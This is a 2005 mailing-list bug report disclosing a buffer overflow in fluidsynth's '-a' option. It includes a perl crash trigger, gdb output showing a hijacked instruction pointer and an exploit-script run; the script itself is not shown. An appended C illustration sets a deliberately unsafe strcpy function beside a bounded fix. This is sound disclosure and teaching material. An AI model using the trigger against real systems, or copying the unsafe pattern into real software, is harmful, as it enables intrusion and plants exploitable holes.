fluid-dev

[fluid-dev] Bug Report: -a overflow


From: Axioplase
Subject: [fluid-dev] Bug Report: -a overflow
Date: Mon, 07 Feb 2005 18:07:31 +0100
User-agent: Mozilla Thunderbird 0.8 (X11/20040926)

fluidsynth can be exploited through an overflow when passing an argument to the "-a" option.
See attached bug report.

Though there isn't a big risk that fluidsynth is suid root, that's a bug anyway...

Axioplase.

--
<PaXaL2> wireless mice are a pain
<PaXaL2> I lost mine

$ uname -a                                                               17:55
FreeBSD XXX.YYY 5.3-RELEASE FreeBSD 5.3-RELEASE #0: Fri Nov  5 04:19:18 UTC 
2004     address@hidden:/usr/obj/usr/src/sys/GENERIC  i386
$ fluidsynth --version                                                   17:55
fluidsynth 1.0.3

$fluidsynth -a `perl -e 'print "A"x500'` 
segmentation fault (core dumped)  fluidsynth -a `perl -e 'print "A"x500'`

$gdb -core fluidsynth.core 
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd".
Core was generated by `fluidsynth'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) info reg
eax            0x41414141       1094795585
ecx            0x0      0
edx            0x280c623e       671900222
ebx            0x280c56a4       671897252
esp            0xbfbfe6cc       0xbfbfe6cc
ebp            0x280c5020       0x280c5020
esi            0x1      1
edi            0x280c6020       671899680
eip            0x41414141       0x41414141
eflags         0x10292  66194
cs             0x1f     31
ss             0x2f     47
ds             0x2f     47
es             0x2f     47
fs             0x2f     47
gs             0x97     151



$ fluidsynth -a `./expl.pl 578 0`
using adress 0xbfbfeb50
using exploit 

$ echo exploit worked > r00ted
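For readers of the report, an added illustration (not fluidsynth's own code, and not from the reporter): the bug class behind the crash above, a command-line option value copied into a fixed-size stack buffer with no length check, next to a bounded version that rejects over-long input. The function names and the 64-byte buffer size are assumptions for this example; the real fluidsynth 1.0.3 code path is not shown on this page.

```c
/* Added example, not fluidsynth source. Shows why a 500-byte "-a" value
 * can end with eip = 0x41414141 ('AAAA'), and the bounded replacement. */
#include <stdio.h>
#include <string.h>

#define DRIVER_NAME_MAX 64   /* assumed fixed buffer size for this example */

/* Unsafe pattern: strcpy() trusts argv to fit the buffer. An argument
 * longer than the buffer overwrites the saved return address on the stack,
 * which is what the gdb register dump in the report shows. */
void set_audio_driver_unsafe(const char *arg)
{
    char driver[DRIVER_NAME_MAX];
    strcpy(driver, arg);               /* no bound check: stack overflow */
    printf("audio driver: %s\n", driver);
}

/* Hardened version: measure the argument only up to the buffer size,
 * reject anything that does not fit with its terminator, copy exactly
 * that many bytes and always NUL-terminate. Returns 0 on success, -1 on
 * rejection, so the caller can exit cleanly instead of crashing. */
int set_audio_driver_safe(const char *arg, char *out, size_t outsz)
{
    const char *nul;
    size_t len;

    if (arg == NULL || out == NULL || outsz == 0)
        return -1;
    nul = memchr(arg, '\0', outsz);    /* scan at most outsz bytes */
    if (nul == NULL) {                 /* no terminator within bound: too long */
        fprintf(stderr, "audio driver name too long (max %zu chars)\n",
                outsz - 1);
        return -1;
    }
    len = (size_t)(nul - arg);
    memcpy(out, arg, len);
    out[len] = '\0';
    return 0;
}

int main(int argc, char **argv)
{
    char driver[DRIVER_NAME_MAX];
    const char *arg = argc > 1 ? argv[1] : "alsa";   /* "alsa" is a sample value */

    if (set_audio_driver_safe(arg, driver, sizeof driver) != 0)
        return 1;                      /* reject, do not crash */
    printf("audio driver: %s\n", driver);
    return 0;
}
```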
